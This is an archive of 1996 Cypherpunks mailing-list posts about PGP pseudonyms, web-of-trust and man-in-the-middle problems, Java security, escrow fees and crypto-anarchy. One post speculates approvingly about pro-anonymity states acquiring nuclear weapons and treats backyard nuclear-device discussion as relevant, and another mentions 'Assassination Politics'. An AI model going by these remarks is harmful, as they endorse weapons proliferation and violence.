On Sun, 28 Apr 1996, Tom Weinstein wrote:
> Rich Graves wrote:
> >
> > Some of the things a valid signature from Jack the Ripper means:

[True statements deleted]

> > 3. If I am Jack the Ripper, I have a way of proving that the code is
> >    my intellectual property.
> 
> How do you prove that?  If I strip off your signature and sign it
> myself, how do you know it's yours?

Hmm. Very interesting point. You would need to make the signature
technology at least tamper-evident by embedding it "somehow," and
recursing infinitely. Yup, sounds pretty impossible, so I'm sure
somebody's going to come up with an answer. Maybe the one-time signature,
or signatures authenticated by location.

> > 4. If I'm not Jack the Ripper, I can say "That wasn't me."
> 
> No you can't.  How do I know that Jack isn't a nym of yours?

Answered elsewhere. Trusted third party swears you're different. Also,
signatures from different nyms are useful even if the identity
relationship among nyms are known.  Compare the nym "Tom Weinstein,
Cypherpunk" with "Tom Weinstein, speaking for Netscape" and "Tom
Weinstein, can't talk during the IPO." 

> > 5. If I am GNU, I can advertise and "enforce" my copyleft policy.
> 
> How?

OK, you probably can't. This is a special case of #3.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 29 Apr 1996 10:41:41 +0800
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: Book: The President's Eyes Only
In-Reply-To: <199604281408.HAA09274@toad.com>
Message-ID: <Pine.3.89.9604281636.A30261-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 28 Apr 1996, rick hoselton wrote:

> The crypto-game is being played "for keeps".  Someday, all crypto 
> may be too strong to break, but for right now, many "bad guys" 
> (and whatever your philosophy, I bet you can find some) use weak 
> crypto, and this allows the US Govt. to know more about what goes 

But then, most of these tend to be either governments far more vulnerable
to citizen crypto than USG or organized crime groups (the results
of black markets, and guess who makes them black?). And terrorists a la 
Hezb'Allah or the IRA are just mafias that do high-impact marketing.

[Sorry to give the standard doctrinaire canned response, but then it's the 
standard unconvincing threat.]

> on in the world.  As long as Uncle Sam keeps his finger on a nuclear 
> trigger, I can see a strong case that knowing what he's doing and
> not getting too surprised are (mostly) good things.

Do you mean him knowing what he's doing or us knowing? ;-)

Thanks for the book reference. I'll go grab it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Mon, 29 Apr 1996 15:06:24 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: PGP and pseudonyms
In-Reply-To: <2.2.32.19960428231217.00ac5b6c@mail.teleport.com>
Message-ID: <Pine.BSF.3.91.960428165931.10757A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >this pseudonym. If this person's secret keyring were stolen, could
> >person=pseudonym be revealed, based on the key ID? Or would it require
> >knowing the passphrase? 
> 
> Yes, the person=personna would be revealed.  No, a passphrase would not be
> needed.
> To demonstrate try "pgp -kv secring.pgp" and see what you get.

I kinda figured that... I was just wondering if maybe the info could be
altered, so that the real info can't be figured without getting the
passphrase. 

> I hope this gets fixed in PGP 3.0.

I guess pseudonymity(sp?) wasn't the main concern when PGP was created.

I suppose a temporary fix would be to not use an ordinary PGP passphrase,
but rather encrypt the whole secring.pgp file. Decrypt it when you need
it, and be very careful to properly clean up when you're done. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Mon, 29 Apr 1996 15:24:11 +0800
To: cypherpunks@toad.com
Subject: learning Java
Message-ID: <199604290024.RAA14184@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I think that learning Java and having fun using Java (it is possible ...
and I speak as someone who doesn't think that programming is necessarily
fun in its own right) is orthogonal to the issue of learning and applying
the applet security model.  In other words, learning Java today won't be a
waste of effort when more sophisticated security schemes come online. 

I like Laura Lemay's book "Teach yourself Java in 21 days" and the
O'Reilly book "Java in a Nutshell."  We also have a tutorial online at
http://java.sun.com/tutorial/, and all kinds of programmer's documentation
at http://java.sun.com/doc/programmer.html

The applet security model is described on http://java.sun.com/sfaq/ [Yes
we know that more and better documentation is needed!] Anyone who wishes,
can get a full source release by faxing us a license agreement.  Source
isn't a substitute for documentation, but some people actually prefer
source to English.  See http://java.sun.com/licensing.html for details on
how to get the full source release. 

As other people have pointed out, applet security != internet security. 
Java is a programming language, and standalone Java apps can and do
implement their own security policies.  

I apologize in advance to Perry and others who will tell me that this
posting of mine isn't relevant to cypherpunks.   I won't do it again.  

Marianne
JavaSoft, Sun Microsystems Inc 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Mon, 29 Apr 1996 04:08:10 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <199604241913.PAA12632@universe.digex.net>
Message-ID: <199604281528.RAA10421@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner <sjb@universe.digex.net> writes:
 bryce@digicash.com writes:
> >3.  My fee per bet is USD5.00 or FIM50.00, or cyb7000.00.  
> >This is for "simple", winner-take-all bets.  For other
> >arrangements, make me an offer.
> 
> Wouldn't it be more reasonable for the fee to be something like 2%?  It
> seems odd that to have a $2 bet settled you'd need to pay $5.  And
> since the ante is required before the bet is formalized, why not just
> take your cut out of the winnings?


You're right.  I wasn't thinking.  I hereby change my fee to
0.


Bryce, Escrow and Arbitration Agent Serving The cypherpunks
List Since 1996




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYOOnUjbHy8sKZitAQGdJAL+LR1RWSD4k3b5YjqG2ekzKAULeiA2bUI4
MkV74a6JzOW/iKX3tS0Y40K5j4Xnp7uOYXbJOsOtHtb0U/J4IrFj1ALbp8B4C4Pr
9EqVuKs1nQZCvoAxbW8/O4Xn38uM5DHR
=+7PU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Mon, 29 Apr 1996 04:18:44 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <01I3X9N6RA1W8Y50LP@mbcl.rutgers.edu>
Message-ID: <199604281539.RAA10757@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

E. Allen Smith <eallensmith@ocelot.rutgers.edu> wrote:
(> Bryce wrote:)
> >1. Acceptable digital signature upon the "bet statement" 
> >from each bettor.  (Note that PGP signatures from PGP key
> >pairs which are not connected to me via the Web of Trust, or
> >which are not verifiable by me via an out-of-band
> >connection, are not acceptable digital signatures.  This is
> >because of the MITM attack problem, not because  I need True
> >Names to be connected to the signatures.)
> 
> 	IIRC, currently Black Unicorn doesn't have any signatures on
> his public key of others. Therefore, this requirement, while understandable,
> could cause a bit of a difficulty in the current situation.


Hm.  This is a toughie.  For one it would help if Black
Unicorn had a "pseudonym keysignature" from someone who had
a Web O Trust link to me.  This would make me more certain
that a hypothetical man in the middle between me and the
rest of you wasn't able to impersonate Black Unicorn.  Of
course, such a MITM could still impersonate Black Unicorn by
being between Uni and the rest of us.  It would help if Uni
made a habit of publishing his true public key via various
difficult-to-intercept channels, but of course we can't
_know_ whether Uni is doing that or not in any case.



Yeah, it's hard to gain trust in the absence of a Mitch (a.k.a.
MITM) between Uni and us.  It is feasible, for my purposes,
though.  We could tie Uni's ostensible pubkey to the Web of
Trust.  We could assume that Uni is resourceful enough to
publish his own pubkey via difficult-to-intercept channels,
to check his own pubkey, and to broadcast a warning if any
active attack is detected.  Then as time passed we could
gain trust in the lack of an active attack on that pubkey.


Currently neither the first (add key to WoT) nor the second
(believe that Uni is actively trying to propagate/check his
key) step is working...


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYORSEjbHy8sKZitAQGXkAMAvU13aY2pzagOtSoYSomvO2tYzZBNZzUw
4Ke8a4tprEOP7r+nkXLH0EJgDEG4OSBzj3FmpxJ6OrMnsb/qDo0vXfI/GlIal0/j
J2z+LxOQvoSOMRKvydZUA/8Wc64+gKYH
=x3Nm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Apr 1996 15:57:07 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <m0uDh1O-00092NC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 PM 4/28/96 -0700, jamesd@echeque.com wrote:

>
>> When you cut off someone's air supply, even the nicest, gentlest
>> person will go into an unrestrained, murderous frenzy.  I expect
>> something similar will happen to even the most "civilized" governments
>> within the next few years, as popular crypto begins to cut off their
>> money supply. 
>
>False on two counts:   
>
>First "frenzy" is exactly the opposite of what the 
>government needs to stay in one piece, to continue 
>to be a government.
>
>Secondly, when you cut of someones air supply, 
>they do not necessarily defend themselves.

While that's obviously an imperfect analogy he gave, I think it's inadvertently 
instructive for an unobvious reason:  Governments are  _supposed_ to be 
products of the will of the people (at least, in so-called "freedom-loving" 
societies they are).   If that's the case, then if society decides that 
governments should be reduced or even eliminated, those governments should 
have no objection.  To whatever extent they DO have an objection, it can 
only be because the government is no longer representing the population as 
it was supposed to do, but has started to represent the vested interests of 
people whose livelihood depends on that government.  And to whatever extent this is 
happening, that's all the more reason to get rid of that government.

Unfortunately, that's exactly the position we find ourselves in today.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Mon, 29 Apr 1996 05:09:50 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <Pine.SUN.3.93.960425030044.3252P-100000@polaris.mindport.net>
Message-ID: <199604281543.RAA11268@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Black Unicorn <unicorn@schloss.li> wrote:
(> "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:)
> > 	IIRC, currently Black Unicorn doesn't have any signatures on
> > his public key of others. Therefore, this requirement, while understandable,
> > could cause a bit of a difficulty in the current situation.
> 
> Please obtain a copy of my current key by finger.


Oh please.  My respect for Uni's acumen just decremented a
couple of notches.  A 2048-bit key, and no signatures?
Rather like a front door with welded plate armor and an open
window, no?


Let's talk more off-list...


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYOSHkjbHy8sKZitAQGCdgL+J7TWOfx0izYITDa3UlXFP68k5DfAFrlb
FWR3NP10/eqDDr/6guzse4Slp0SoCT49uVsy4kiZvwOT6uUIOv1DhobrUjHJMF1T
LmNlAAPnAYK/NfwmZNQAX6NRbLPxd66o
=EUxl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 11:38:08 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Proving that you're not a nym [was Re: Mindshare and Java]
In-Reply-To: <Pine.GUL.3.93.960428114931.13032D-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.93.960428175310.19393A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Rich Graves wrote:

> In this specific case, no, there is nothing you can do to prove that
> you're not the Unicorn of Color, because there are no signatures on his or
> her key.
> 

Would you PLEASE, get your facts straight?

Try checking it yourself maybe, instead of assuming this to be true
because someone else said so?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Mon, 29 Apr 1996 05:26:58 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: connecting Uni to the Web O Trust
In-Reply-To: <Pine.SUN.3.93.960425030044.3252P-100000@polaris.mindport.net>
Message-ID: <199604281556.RAA11900@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Ya gotta get yourself connected, as the Stereo MC's said.


Unfortunately I can't see anyway to gain trust in this
pseudonym since I don't believe that the ostensible owner,
name of "Black Unicorn", understands about how to establish
a strong pseudonym in the Web O Trust.


I mean, I could explain it to him, but not even counting the
difficulties of communicating such complex concepts among
humans, there is the fact that if Mitch is here, he can
prevent the real Uni from seeing the explanation, and he can
act in Black Uni's place as if he understands.  Then he can
go through the necessary steps to increase our trust in his
pubkey, as if Uni were going through them.


There would be only one problem for Mitch:  there would be
some knowledge shared by the facade Uni and the rest of us
that was not shared by the real Uni and the rest of us.
Forever into the future whenever this knowledge came up in
conversation Mitch would have to break automated-active-attack
mode and go into acting mode to prevent us from realizing
that we remembered history differently.


Wouldn't be cool if we could somehow make much of our
conversation depend on that shared memory in some
non-automatible way?  Then we could just recurse, making
more and more of the conversation depend on previous
conversation in a non-automatible way.  Eventually all of
our conversation would have to be acted by a human MITM
instead of just falsely digitally authenticated by an
automated MITM...


more later,

Bryce

P.S.

- -----BEGIN PGP MESSAGE-----
Version: 2.6.2i

hQEMAy1onm9OaF05AQf8D+nK6n4pobVlbL04r/un3dwxbOlCW/C5Iu8a//Wiu49B
+ExkmlqK04cJbyF17N5F+j628RncYTyohUXvYPC0UtQPWWV3bj2euxFyzr8d40Cn
W0mKGI4/6W29RYXwEn/3g+g+2sJt/HCIG1/RnhbcOCubJIQRYIY/7srmuiahLVob
a1bKxd5Zp1JRHHmEPvFrpzz/TuiUKf4JGczcrhMYlt3q1fFsB4cW2inA9ymHdHZS
OPiO+9au67fsv0YlF8qGoqEgeKuyX/pZUs1knntH7IFkjCziD0EeaTg+wvs5veJY
fpJdTcCES0tuqFD+4WM1CV0Ad8mPLOGDsxF2vBMOuaYAAADVYpDriBhb5KIQJsTG
M9957b/XTA7T2mq+sPsYd8ivoVgQqgiVYcJzpd0K5oqJTlsNpKzN23R2cfS4EGqV
Xg3KNZqMSpA+u7Lx5OgZaeG0qaSpAtPxX7z6IZQL71YGjaoqNBaZHpuPdRIiic2g
jfaX3DBBndue1801fQsahyqUqw2H/AeEVC7aJVlN9L/h7f85EIeIrLFPkl09uM9s
XqalftyF90SAvynSVv+zVoAhvSETtTwecryM9sbpqQiDnYYw3zDsCK/cTOAcjtYo
c68y2eyNPG8p
=5LFk
- -----END PGP MESSAGE-----

EALLENSMITH could have been included in the encryption but 
I couldn't find a PGP key for him.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYOVIEjbHy8sKZitAQGl0wMAoLEe5xqPMs9J2vclqbmN2QNCyXk4l3qH
g4TUVepq1gMlXXJ4w2Xae/XxsX7Ytu5aeNlkcUsLUgjtkAm63WAaJszgQGtLwqTI
poZ4wfv7DMZC0n9lXsfacrBtIaJCKLTj
=2e1i
-----END PGP SIGNATURE-----
Replied: Sun, 28 Apr 1996 17:43:29 +0200
Replied: Black Unicorn <unicorn@schloss.li>
Replied: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Replied: cypherpunks@toad.com
Return-Path: unicorn@schloss.li
Received: from polaris.mindport.net (polaris.mindport.net [205.219.167.2]) by digicash.com (8.6.11/8.6.10) with ESMTP id JAA11303 for <bryce@digicash.com>; Thu, 25 Apr 1996 09:02:23 +0200
Received: from localhost (unicorn@localhost) by polaris.mindport.net (8.6.12/8.6.12) with SMTP id DAA03059; Thu, 25 Apr 1996 03:01:57 -0400
Posted-Date: Thu, 25 Apr 1996 03:01:57 -0400
Date: Thu, 25 Apr 1996 03:01:56 -0400 (EDT)
From: Black Unicorn <unicorn@schloss.li>
X-Sender: unicorn@polaris.mindport.net
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
cc: bryce@digicash.com, cypherpunks@toad.com
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <01I3X9N6RA1W8Y50LP@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960425030044.3252P-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 24 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"bryce@digicash.com" 24-APR-1996 10:05:20.14
> 
> >1. Acceptable digital signature upon the "bet statement" 
> >from each bettor.  (Note that PGP signatures from PGP key
> >pairs which are not connected to me via the Web of Trust, or
> >which are not verifiable by me via an out-of-band
> >connection, are not acceptable digital signatures.  This is
> >because of the MITM attack problem, not because  I need True
> >Names to be connected to the signatures.)
> 
> 	IIRC, currently Black Unicorn doesn't have any signatures on
> his public key of others. Therefore, this requirement, while understandable,
> could cause a bit of a difficulty in the current situation.

Please obtain a copy of my current key by finger.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 12:45:35 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Mindshare and Java
Message-ID: <01I4326V6O0W8Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ses@tipper.oit.unc.edu"  "Simon Spero" 26-APR-1996 02:36:25.74

>In SolidOak, the verification is more or less free of charge, as it runs
>the signature code in a separate low priority thread, which often gets to
>complete during network induced latencies when fetching sub-classes, which
>can be initiated on class download before the code is instantiated.It also
>allows multiple classes to verified with just one PKOP, so the cpu cost 
>is amortised over a lot of stuff

	Umm... doesn't that allow code with a faked signature to be temporarily
trusted, long enough to possibly do some damage? For instance, in fetching
sub-classes, what is the code allowed to "know" in fetching them? Such
information could be sent out, including by what the code was requesting.
	Sorry if the above is not applicable; please explain why not, if so.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 12:09:03 +0800
To: frantz@netcom.com
Subject: Re: The Joy of Java
Message-ID: <01I432H2ATAI8Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 27-APR-1996 02:59:17.07

>At  3:57 PM 4/26/96 -0700, Timothy C. May wrote:
>>I think the interesting target date to plan for is a year from now.

>I said a few months ago that I thought Java would be ready for prime time
>in a couple of years.  I think we are in complete agreement here.

	If Java can indeed be reworked to provide proper security (e.g., if
Perry's incorrect in this case - everyone's falliable), then how much
modifications are likely to be necessary? I'm currently looking at the
possibility of learning a modern high-level computer language, and Java looks
like one of the more promising options. (I currently know a bit of Applesoft
Basic, Quattro Pro Macro language, VAX/VMS .COM file language, and MS-DOS
batch file language.) In other words, I'm wondering if it's worth my while to
learn Java now, or if I should wait (and possibly learn another language) until
the bugs are worked out? Will removing the flaws make it such a different
language that learning it now won't be of much use for someone like me?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 13:03:31 +0800
To: unicorn@schloss.li
Subject: Re: Anonymous banking
Message-ID: <01I432OG4L8G8Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 27-APR-1996 23:07:10.42

>Well, using attorney client confidentality to shield things otherwise
>discoverable just doesn't work.

	Given discussions as to attorneys holding passphrases, et al, perhaps
a tutorial from the lawyers on the list (yourself and others, since
disagreements among J.D.'s have been known to happen) on what attorney-client
confidentiality does cover?

>There are many mail forwarding services that don't use attornies.  An
>attorney is going to charge you by the hour for this service.  I don't
>think you really want to pay for it.

	Most of them aren't anonymous, either... although that does give me
the thought of going to one outside the US and its reporting requirements.
They'd know who I was (or at least the address it was going to), but at least
nobody else would know. Any suggestions, since you've been writing of the joys
of nymdom recently?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 13:01:17 +0800
To: unicorn@schloss.li
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <01I4336FFBS68Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 27-APR-1996 23:39:58.42

>Now, how are you going to impose taxes on heads if it becomes impossible
>to track down a person?  You have to find them to tax them.  With secure,
>anonymous communications, people can exist without giving away their
>location, business interests, property holdings, etc...etc...  Travel

	However, one can ask at various points for identification, possibly
cryptographically protected. If that ID hasn't had its head tax paid recently,
then you sieze the person. (See below for why I'd call this a probably
growing tendency). The ID in question can be biometric, and thus can't be
passed (easily) from one person to another once the head tax has been paid on
it. Now, what sorts of points one can ask for identification is one place where
it gets interesting. If you are doing property taxes, then you can require
that the "registered owner" present the cash. But that doesn't prevent someone
from hiring someone else to be the registered owner. However, except for
schemes such as Assasination Politics et al, enforcing that supposed owner from
becoming the de facto as well as de jure owner can be difficult. (In other
words, if he says you don't own the property, and the state backs him up
because he's paid his head tax and you haven't, then you've got a problem.)
Other such interactions are whenever you get caught doing something physical,
such as through various police stings. If you don't have your head tax paid
on some ID with biometric links to you, then you get put in jail longer.

>The only option for government becomes forcible seizure of land and or
>persons to enforce taxation.  Note that even today property in
>the United States owned by tax evaders is difficult to seize if
>one cannot prove tax evasion.  (Taxation is merely one example of
>regulations that become difficult to enforce with proper cryptography in 
>place by the way).

	As the state becomes more and more desperate, it seems likely that
seizures (or even destruction) of property and persons on such grounds will
become more and more frequent and easy. Unconstitutional in most cases?
Probably... but they may stop caring.

>This being so I think it obvious that a manner of market economy among
>political systems will emerge.  Some nation states will participate in
>what liberal-economists call a "race to the bottom" where they will
>continue to reduce regulations and so forth to attract businesses and thus
>income.  Those on the far left somehow count this a _bad_ thing, citing 
>typically environmental issues.  It never ceases to amaze me that they
>don't get the message when 20% of the corporate population departs and 
>they still don't realize that just raising taxes won't solve the problem.

	Agreed. I just don't think the "bottom" is zero. In most areas,
some government is likely to remain. (Indeed, for my purpose of maximizing
individual choices (with the most important of such choices being those
known as civil liberties), I currently believe that this is for the best.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 15:44:19 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <01I433EEPIGC8Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mkj@october.segno.com" 28-APR-1996 10:29:40.72

>Most other arguments put forth so far in this thread, about how people
>"won't stand for" certain government behaviors and so forth, I don't
>find convincing.  Modern military technologies, especially in the
>U.S., make the prospects of a sucessful popular uprising dubious.

	Well, atomic bombing your own populace is not exactly the way for a
nation-state to survive. Most other high-effectiveness means of taking out
internal rebels also don't work very well. Why do you think a lot of areas
with civil wars are kind of destroyed by the end of them? Even with the low
level of military technology at the time, the South was quite thoroughly
devastated by the end of the Civil War - and it would have been even without
such "atrocities" (so-called by Confederate sympathizers) as the burning of
Atlanta.

>Which brings us to the "flight of capital" issue.  Will nations be
>able to compete freely for the loyalty of the rich?  Or will the most
>powerful nations form effective coalitions, and perhaps simply bomb
>"rogue" nations into the stone age?

	It depends partially on whether those "rogue" nations have nuclear
weapons (or, like Japan, the economic equivalents). I suspect that the best
way to have a country with fully anonymous digital cash in widespread, legal
use will be to have that country be a nuclear power. Thus, discussions of how
to construct a backyard nuclear device (the subject of earlier debates on here
between Jim Bell and others) may be quite relevant. Having those loyal rich
types around to fund such an effort may make such possible, especially with the
breakdown of the Soviet Union and the resulting availability of nuclear
material.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 29 Apr 1996 14:42:35 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: code vs cypher
Message-ID: <199604290203.TAA03998@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com" 28-APR-1996 19:31:33.43
> > [Rich Graves] continually brings up this irrelevant 
> > topic whenever someone complains about [his] egregious 
> > statism on other issues:  

At 07:39 PM 4/28/96 EDT, E. ALLEN SMITH wrote:
>	And what's wrong with being a statist on _some_ issues? 
> A strict party line will do nobody any good.

I believe my complaint was primarily that he kept beating on
Nazi issues, which are now entirely off topic since the German
attempt to politically censor the internet was defeated.

Now if the next time somebody calls him a statist, Rich would
tell us what he is doing about the CDA, instead of lecturing us
about the Simon Weisenthal center, that would be fine, provided 
he tells us ONCE, or maybe twice.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 29 Apr 1996 16:03:57 +0800
To: cypherpunks@toad.com
Subject: NOISE - AARMs
Message-ID: <9604282326.AA01174@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



>From MAILER-DAEMON  Sun Apr 28 19:24:26 1996
Received: by pig.die.com (5.65/1.35)
	id AA01144; Sun, 28 Apr 96 19:24:26 -0400
Date: Sun, 28 Apr 96 19:24:26 -0400
From: MAILER-DAEMON (Mail Delivery Subsystem)
Subject: Returned mail: User unknown
Message-Id: <9604282324.AA01144@pig.die.com>
To: die
Status: RO

   ----- Transcript of session follows -----
550 cypherpunks.com... User unknown

   ----- Unsent message follows -----
Received: by pig.die.com (5.65/1.35)
	id AA01142; Sun, 28 Apr 96 19:24:26 -0400
Message-Id: <9604282324.AA01142@pig.die.com>
Subject: Re: Cell Kill 2
To: asgaard@sos.sll.se (Asgaard)
Date: Sun, 28 Apr 1996 19:24:26 -0400 (EDT)
From: "Dave Emery" <die@pig.die.com>
Cc: cypherpunks.com
Reply-To: die@die.com
In-Reply-To: <Pine.HPP.3.91.960428210130.10419A-100000@cor.sos.sll.se> from "Asgaard" at Apr 28, 96 11:44:03 pm
X-Mailer: ELM [version 2.4 PL24alpha3]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1237      


Asgaard writes > 
> enough for this application of force. It makes more sense if
> he was using a direct (mobile) phone-satellite device, assuming
> such devices are emitting a stronger signal that could easily
> be targeted by AWAC type technology, or even satellites (that
> they are communicating with in the first place).
> 

	Much the most likely satellite phone is the widely used INMARSAT
A or C types which radiate continuous narrow band (nbfm or QPSK) uplinks
in L band (around 1636 mhz) at considerable power (multiple tens of
watts)  via antennas with large sidelobes (the fact that the antennas
are small and portable on most satellite terminals mean that they
radiate lots of energy in various directions other than the satellite
because of the limitations of the physical optics involved at such a
long wavelength).

	This would be a sitting duck for an anti-radiation missle.  The
US has had such missle's since the Vietnam era for knocking out
radar sites, one can presume the USSR developed such weapons as well.

	Why the Russians did not use this technology earlier 
remains puzzling ... and why Dudeyev used a satellite phone
which made him a sitting duck is even less clear.

						Dave Emery
						die@die.com
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 15:04:00 +0800
To: hoz@univel.telescan.com
Subject: Re: Book: The President's Eyes Only
Message-ID: <01I434LP0CLS8Y53B6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hoz@univel.telescan.com" 28-APR-1996 13:57:13.98

>The cypherpunks relevance (Besides the David Kahn quote) is 
>the frequent mention of NSA decrypts and SIGINT.  The frequency 
>that nations and individuals have used (and apparently continue 
>to use) breakable encryption is incredible.  The intelligence 
>that has been derived by breaking them is worth a great deal, 
>in dollars and maybe lives.  This book has made me understand a 
>bit, why a government might try to limit strong cryptography.  

	But do keep in mind that it's not just the US government that can
decrypt weak cryptography. So can a lot of other governments... including ones
like France and Japan that engage in a lot of commercial espionage. And ITAR
restrictions have hindered the use of cryptography in the US by limiting the
market for products.
	As has been said on here in the past, there are probably several
groups within the NSA. Some think that getting the info is more important
than protecting US citizens from having _their_ info stolen. Some think the
